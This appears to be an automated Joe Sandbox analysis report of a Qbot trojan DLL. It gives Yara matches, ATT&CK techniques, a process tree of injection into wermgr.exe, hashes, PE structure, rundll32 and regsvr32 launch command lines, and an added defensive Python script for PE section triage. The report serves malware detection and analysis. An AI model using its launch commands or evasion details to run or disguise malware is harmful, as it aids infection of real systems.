Source: Yara match | File source: 4.2.rundll32.exe.3460000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.wermgr.exe.29b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.wermgr.exe.29b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.3160000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.3.rundll32.exe.32e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
ATT&CK matrix, one tactic per line (a leading number is the signature count the report shows for that technique; techniques without a number are unmatched matrix cells):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 3 Native API; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 311 Process Injection; 2 Obfuscated Files or Information; 1 Regsvr32; 1 Rundll32; 1 Software Packing; 1 DLL Side-Loading
Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 11 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 File and Directory Discovery; 15 System Information Discovery; Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: 1 Screen Capture; 1 Credential API Hooking; 1 Archive Collected Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior Graph ID: 715156 | Sample: pebbles.dat.dll | Start date: 03/10/2022 | Architecture: WINDOWS | Score: 96
Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Qbot; 3 other signatures
Process tree (signatures listed after the process that triggered them):
loaddll32.exe
  rundll32.exe: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Writes to foreign memory regions; Allocates memory in foreign processes
    wermgr.exe: dropped C:\Users\user\Desktop\pebbles.dat.dll (PE32)
  cmd.exe
    rundll32.exe: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Writes to foreign memory regions; Allocates memory in foreign processes; Maps a DLL or memory area into another process
      wermgr.exe
  regsvr32.exe: Maps a DLL or memory area into another process
    wermgr.exe
  3 other processes

Source | Detection | Scanner | Label
pebbles.dat.dll | 17% | ReversingLabs |
pebbles.dat.dll | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
4.2.rundll32.exe.3460000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
5.2.rundll32.exe.4a60000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
3.2.regsvr32.exe.3160000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
8.2.wermgr.exe.2d40000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
7.0.wermgr.exe.2c60000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
8.0.wermgr.exe.2d40000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
7.2.wermgr.exe.2c60000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
9.0.wermgr.exe.29b0000.0.unpack | 100% | Avira | HEUR/AGEN.1234562
No Antivirus matches
No Antivirus matches
No contacted domains info
No contacted IP infos
          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:715156
          Start date and time:2022-10-03 17:26:43 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 10m 25s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:pebbles.dat.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:22
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal96.troj.evad.winDLL@20/1@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 25.4% (good quality ratio 24.2%)
          • Quality average: 77.4%
          • Quality standard deviation: 26%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 40
          • Number of non-executed functions: 44
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Override analysis time to 240s for rundll32
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): fs.microsoft.com
• Not all processes were analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
Time | Type | Description
17:27:47 | API Interceptor | 9x Sleep call for process: wermgr.exe modified
          No context
          Process:C:\Windows\SysWOW64\wermgr.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):4096
          Entropy (8bit):4.667100449217363
          Encrypted:false
          SSDEEP:96:UORfeVXzt2Dk1dyqIF9JhsLwAOhf2ZW2wIPD:UORAjMkXIKPD
          MD5:21928784DA52AB71A60AF59EFA95CDAD
          SHA1:4FF8ECD9B0370614EA0C3D8583A51DF9D2481844
          SHA-256:285861283C9DC3F2D892B3CC186AD64CF17217D394B227A70B6C657C39D6568B
          SHA-512:CD79DFD111B8E1E8A3EB2F7E57DFB71D76AF677D6696564C15413391D7734F0C4A10D3987A3D4D9739C082C0710BC5B8566A4D4AB295EA501B5D909D0294C3F8
          Malicious:true
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.....~[..~[..~[..}Z..~[..{Z..~[..zZ..~[I.zZ..~[I.}Z..~[I.{ZX.~[...Z..~[...[o.~[..wZ..~[..~Z..~[..[..~[...[..~[..|Z..~[Rich..~[........................PE..L.....:c...........!.........~..............0............................................@..........................p.......A..P................................6......p...........................0...@............@...............................data....a.......b.................. ....reloc6s.............f.............. ..`CODE.........0...........................idata..0....@......................@..@.hata....5...P...6..................@..@DATA....T............J..............@..@.rsrc................L..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................
          File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Entropy (8bit):6.9607693404023925
          TrID:
          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
          • Generic Win/DOS Executable (2004/3) 0.20%
          • DOS Executable Generic (2002/1) 0.20%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:pebbles.dat.dll
          File size:493056
          MD5:d89521adaf6418e6ebe43b1a1a9d2af9
          SHA1:38cac8495ef43e51cdac1cb5e85d10137b365bee
          SHA256:1965dc57456d4fc01b6ce0f242d80776fe08a16354e6177255cba618348355ac
          SHA512:703db1e11372070dbbabc8a96c8600f079273e4dfad4e5437a5fd4b046187cf9f24b47ad68fadaf3bcf7fb1dcad8ecf98edd299281938eb144c4c6c29d68461f
          SSDEEP:12288:Y2X+B4HKFVxT5jXAcOf35HI9H5RGqdIhr54f:L5EVl5DC4HDbd
          TLSH:DBA48D0AB612C430D66910B12876BBE047ACBD325E751EDF73805F778A641F77A29F22
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.....~[..~[..~[..}Z..~[..{Z..~[..zZ..~[I.zZ..~[I.}Z..~[I.{ZX.~[...Z..~[...[o.~[..wZ..~[..~Z..~[...[..~[...[..~[..|Z..~[Rich..~
          Icon Hash:74f0e4ecccdce0e4
          Entrypoint:0x100382d9
          Entrypoint Section:.data
          Digitally signed:false
          Imagebase:0x10000000
          Subsystem:windows cui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
          Time Stamp:0x633AE6FF [Mon Oct 3 13:43:27 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:8877a7b766af3aace7fcad8462a174cc
          Instruction
          push ebp
          mov ebp, esp
          cmp dword ptr [ebp+0Ch], 01h
          jne 00007F5C910C8327h
          call 00007F5C910C8844h
          push dword ptr [ebp+10h]
          push dword ptr [ebp+0Ch]
          push dword ptr [ebp+08h]
          call 00007F5C910C81D3h
          add esp, 0Ch
          pop ebp
          retn 000Ch
          cmp ecx, dword ptr [10001D84h]
          jne 00007F5C910C8323h
          ret
          jmp 00007F5C910C892Dh
          mov ecx, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], ecx
          pop ecx
          pop edi
          pop edi
          pop esi
          pop ebx
          mov esp, ebp
          pop ebp
          push ecx
          ret
          push eax
          push dword ptr fs:[00000000h]
          lea eax, dword ptr [esp+0Ch]
          sub esp, dword ptr [esp+0Ch]
          push ebx
          push esi
          push edi
          mov dword ptr [eax], ebp
          mov ebp, eax
          mov eax, dword ptr [10001D84h]
          xor eax, ebp
          push eax
          push dword ptr [ebp-04h]
          mov dword ptr [ebp-04h], FFFFFFFFh
          lea eax, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], eax
          ret
          push eax
          push dword ptr fs:[00000000h]
          lea eax, dword ptr [esp+0Ch]
          sub esp, dword ptr [esp+0Ch]
          push ebx
          push esi
          push edi
          mov dword ptr [eax], ebp
          mov ebp, eax
          mov eax, dword ptr [10001D84h]
          xor eax, ebp
          push eax
          mov dword ptr [ebp-10h], esp
          push dword ptr [ebp-04h]
          mov dword ptr [ebp-04h], FFFFFFFFh
          lea eax, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], eax
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push ecx
          lea ecx, dword ptr [esp+08h]
          sub ecx, eax
          and ecx, 0Fh
          add eax, ecx
          sbb ecx, ecx
          or eax, ecx
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x57010 | 0x10f | .data
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74188 | 0x50 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7a000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7b000 | 0x36b4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x311c0 | 0x70 | .data
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x31230 | 0x40 | .data
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x74000 | 0x184 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.data | 0x1000 | 0x5611f | 0x56200 | False | 0.6558956594702468 | data | 7.0153365923230595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc6s | 0x58000 | 0x1a0f9 | 0x1a200 | False | 0.3239383971291866 | COM executable for DOS | 6.066972398111804 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
CODE | 0x73000 | 0x200 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x74000 | 0xa30 | 0xc00 | False | 0.404296875 | data | 4.897788340416598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.hata | 0x75000 | 0x35e7 | 0x3600 | False | 0.7127459490740741 | data | 5.561450278641814 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
DATA | 0x79000 | 0x54 | 0x200 | False | 0.162109375 | data | 1.2433795844140498 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x7a000 | 0x1e0 | 0x200 | False | 0.53125 | data | 4.724728911998389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7b000 | 0x36b4 | 0x3800 | False | 0.7310267857142857 | data | 6.633507194727193 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
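The section table above is what the static signatures in this report are built on: the entry point 0x100382d9 resolves into .data, which is marked code, executable and writable at once; the section named CODE holds no raw data and is not executable; and .reloc6s and .hata are not names any common linker emits. The following script is an added example (not code from the report or from Joe Sandbox) that rebuilds a minimal PE32 header from the values listed above, parses it back with a hand-written section-table reader, and applies those heuristics, plus the 8-bit Shannon entropy the report shows per section. The header bytes and the set of "standard" section names are this example's assumptions; the raw section contents of the sample are not reproduced.

```python
"""Static PE section triage, reproducing the checks behind this report's
entry-point, RWX-section and non-standard-name signatures.

Added example, not code from the report or Joe Sandbox. The header is built in
memory from the report's section table (image base 0x10000000, entry point
0x100382d9); section contents are not included.
"""
import math
import struct
from collections import Counter

# IMAGE_SCN_* bits from the PE/COFF specification
SCN_CNT_CODE = 0x00000020
SCN_CNT_INITIALIZED_DATA = 0x00000040
SCN_CNT_UNINITIALIZED_DATA = 0x00000080
SCN_MEM_DISCARDABLE = 0x02000000
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000

# Assumed set of names emitted by MSVC, GCC/MinGW and Borland/Delphi linkers.
STANDARD_SECTION_NAMES = {
    ".text", ".rdata", ".data", ".idata", ".edata", ".pdata", ".rsrc",
    ".reloc", ".bss", ".tls", ".CRT", ".textbss", "CODE", "DATA", "BSS",
}
CODE_SECTION_NAMES = {".text", "CODE", ".textbss"}

# (name, virtual address, virtual size, raw size, characteristics) from the report.
REPORT_SECTIONS = [
    (".data",    0x1000,  0x5611f, 0x56200, SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE),
    (".reloc6s", 0x58000, 0x1a0f9, 0x1a200, SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ),
    ("CODE",     0x73000, 0x200,   0x0,     SCN_CNT_UNINITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE),
    (".idata",   0x74000, 0xa30,   0xc00,   SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ),
    (".hata",    0x75000, 0x35e7,  0x3600,  SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ),
    ("DATA",     0x79000, 0x54,    0x200,   SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ),
    (".rsrc",    0x7a000, 0x1e0,   0x200,   SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ),
    (".reloc",   0x7b000, 0x36b4,  0x3800,  SCN_CNT_INITIALIZED_DATA | SCN_MEM_DISCARDABLE | SCN_MEM_READ),
]
IMAGE_BASE = 0x10000000
ENTRY_POINT_VA = 0x100382d9


def build_pe_header(sections, image_base, entry_rva):
    """Assemble a minimal PE32 header (DOS stub, COFF header, optional header,
    section table). Only the fields parse_sections() reads are meaningful."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3c - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224  # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14c, len(sections), 0, 0, 0, opt_size, 0x2102)
    opt = struct.pack("<H", 0x10b) + b"\x00" * 14 + struct.pack("<I", entry_rva)  # AddressOfEntryPoint @16
    opt += b"\x00" * 8 + struct.pack("<I", image_base)                           # ImageBase @28
    opt += b"\x00" * (opt_size - len(opt))
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, raw, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, raw, chars in sections
    )
    return dos + b"PE\x00\x00" + coff + opt + table


def parse_sections(data):
    """Return (image_base, entry_rva, sections) from a PE32 image in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe = struct.unpack_from("<I", data, 0x3c)[0]
    if data[pe:pe + 4] != b"PE\x00\x00":
        raise ValueError("PE signature missing")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10b:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    sections = []
    for i in range(nsec):
        name, vsize, va, raw, _, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\x00").decode(), "va": va, "vsize": vsize, "raw": raw, "chars": chars})
    return image_base, entry_rva, sections


def triage(image_base, entry_rva, sections):
    """Apply section-level heuristics; returns (entry section name, findings)."""
    findings, entry_section = [], None
    for s in sections:
        name, chars = s["name"], s["chars"]
        executable = bool(chars & SCN_MEM_EXECUTE)
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw"]):
            entry_section = name
        if executable and chars & SCN_MEM_WRITE:
            findings.append(f"{name}: writable and executable (code can be rewritten in place)")
        if name not in STANDARD_SECTION_NAMES:
            findings.append(f"{name}: non-standard section name")
        if name in CODE_SECTION_NAMES and not executable:
            findings.append(f"{name}: named like a code section but not executable (raw size {s['raw']:#x})")
        if chars & SCN_CNT_CODE and not executable:
            findings.append(f"{name}: flagged IMAGE_SCN_CNT_CODE but not executable")
    entry_va = image_base + entry_rva
    if entry_section is None:
        findings.append(f"entry point {entry_va:#x} is outside every section")
    elif entry_section not in CODE_SECTION_NAMES:
        findings.append(f"entry point {entry_va:#x} lies in {entry_section}, not in a standard code section")
    return entry_section, findings


def entropy(data):
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), as shown per section above."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage_report_sample():
    """Round-trip the report's section table through the builder and parser, then triage it."""
    image = build_pe_header(REPORT_SECTIONS, IMAGE_BASE, ENTRY_POINT_VA - IMAGE_BASE)
    return triage(*parse_sections(image))


if __name__ == "__main__":
    section, findings = triage_report_sample()
    print("entry point section:", section)
    for f in findings:
        print(" -", f)
    print("entropy of 256 distinct bytes:", entropy(bytes(range(256))))
```

Running it on the reconstructed header flags .data as writable and executable, .reloc6s and .hata as non-standard names, CODE as a code-named section that cannot execute, and the entry point as lying in .data. On a real file, pass the file bytes straight to parse_sections() and feed each section's raw bytes to entropy(); values near 7 and above, as for .data here, usually mean packed or encrypted content that will only be readable from a memory dump.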
Name | RVA | Size | Type | Language | Country
RT_MANIFEST | 0x7a060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
DLL | Import
KERNEL32.dll | Sleep, DebugBreak, GetCurrentProcess, lstrlenA, GetCurrentThreadId, lstrcmpA, VirtualAlloc, GetVersion, GetCommandLineA, GetFileAttributesA, GetCurrentThread, GetCurrentProcessId, GetModuleHandleW, lstrcmpiA, CreateFileW, CloseHandle, GetModuleHandleA, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetStdHandle, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, MoveFileExW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetFilePointerEx, WriteConsoleW
ADVAPI32.dll | CryptCreateHash, CryptHashData, CryptDestroyHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextA
SHLWAPI.dll | PathFindExtensionA, PathFindOnPathA, PathFileExistsA, PathFindSuffixArrayA, StrToIntA
Name | Ordinal | Address
DllRegisterServer | 1 | 0x1006eb00
DllUnregisterServer | 2 | 0x1006f6f0
bewailable | 3 | 0x10058e00
courtlet | 4 | 0x10063590
noncensored | 5 | 0x10067e60
rhizocarpean | 6 | 0x100605f0
stine | 7 | 0x10069040
strigiles | 8 | 0x1005de90
targetlike | 9 | 0x1006b820
trimethoxy | 10 | 0x10061fd0
Language of compilation system | Country where language is spoken
English | United States
          No network behavior found
          Target ID:0
          Start time:17:27:36
          Start date:03/10/2022
          Path:C:\Windows\System32\loaddll32.exe
          Wow64 process (32bit):true
          Commandline:loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"
          Imagebase:0x1200000
          File size:116736 bytes
          MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          Target ID:1
          Start time:17:27:37
          Start date:03/10/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6edaf0000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:2
          Start time:17:27:37
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Imagebase:0xa60000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:3
          Start time:17:27:37
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline:regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Imagebase:0x8c0000
          File size:20992 bytes
          MD5 hash:426E7499F6A7346F0410DEAD0805586B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          Target ID:4
          Start time:17:27:37
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Imagebase:0x1280000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:high

          Target ID:5
          Start time:17:27:37
          Start date:03/10/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer
          Imagebase:0x1280000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
